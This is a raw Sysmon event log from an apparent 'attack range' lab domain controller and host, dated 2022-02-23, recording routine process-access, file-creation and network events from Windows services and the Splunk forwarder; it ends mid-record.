11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000296056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:35.640{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49307-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.066{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C6D52AC7F66FBEB2032FE7D0633C34,SHA256=B799C79545C34069D432C1BE9F2F5EFFA267F30584D0AE5FEBEE8DB73E7BC4AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:38.538{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F18FDB48F122EB891F22E94278881EF3,SHA256=F4ABB2BF03DAF2AEB11CA8C786A736EA86068CE94724F2E925B9BCCC34724B54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:38.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53697F576840FD9058F9B3C04A9C566,SHA256=1C2A5FEC3659E8A1C643235756207A8A70EF82D8AEC693CA93FEF59274DD1DEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:39.554{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AAD387037F22C265145C4C326F9AABF,SHA256=3AC0C0DD67D6FCC855CD320F5317857045D90F8CB546A34577A126FBCB4B643F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:39.450{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24393FEC2EDBEB8409B0008CB1D0F454,SHA256=88558B6392BBB993F375B89C772DAF0E7935E0386EA931FE7AF41CA3315CA988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:40.481{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D16EDFABD3A6E763ECFC0F1A663CFF0,SHA256=67F9787DE7D58FDF13824E51D7CC64554503F83D896E2AF8079E233532EDEB11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:40.570{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D684A0E4348218894B5012CC2F7B70B,SHA256=27FC921A1B38C5CEF4C1B5FC035F8140C398D4098F13253D1776DE76A948B52F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:40.281{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:39.741{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49308-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000296102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:41.496{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAD8B9B2E38F3EAE56941D96D2BCAF85,SHA256=2D1054E240C982C886E4822F75F9DE5CCBB64906E2F1615F36D9F885CAFF537A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:41.585{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3502F8A1286B7DF72B44027A5BFAF65B,SHA256=1413A28ABBA6D1069E91DD5A170E6B7E246445BC470996406A125F74B3373A04,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:39.645{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51563-false10.0.1.12-8000- 23542300x8000000000000000296104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:42.512{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7A521CC00119E6B3D13CC4E49AB8ED,SHA256=E98331B9B5209A33F40917FD606045DD8B9437048344D9961CB272D561E2D117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:42.601{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF32A96856547429891C040662D349F6,SHA256=0C4DA4CE7426B4EF847F2E422B1EFEF056F41C5D6E6E18219FDDCD843B3F0D70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:43.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C425DCD19221995258A77756B6AF899C,SHA256=A9380936619708D392475AEFA2B0E283EAC44189DC2F3AE499086A64AB6F1598,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:41.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49309-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:43.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3797A4059DC4DA556D8B62A2ECD75FFD,SHA256=067D549F69DB6488F77023B65F0CF226C90133FC0533D7773B8B03E88B5984A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:44.624{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-152MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:44.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11F0671A82A04E28500DD976B5507FFB,SHA256=1A72FD44191817E87886BCA15F7F2B69FB2591A0BFD7146C6248A20DC1F40437,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.820{4F8D34B0-15F8-6216-DE04-000000003902}32322404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C8EE84759285CFA38B62D1CA154B51B,SHA256=D7A2283237375950D1AC1388908BC07868B33B1B8882EDB1A54A41117724200D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15F8-6216-DE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-15F8-6216-DE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15F8-6216-DE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 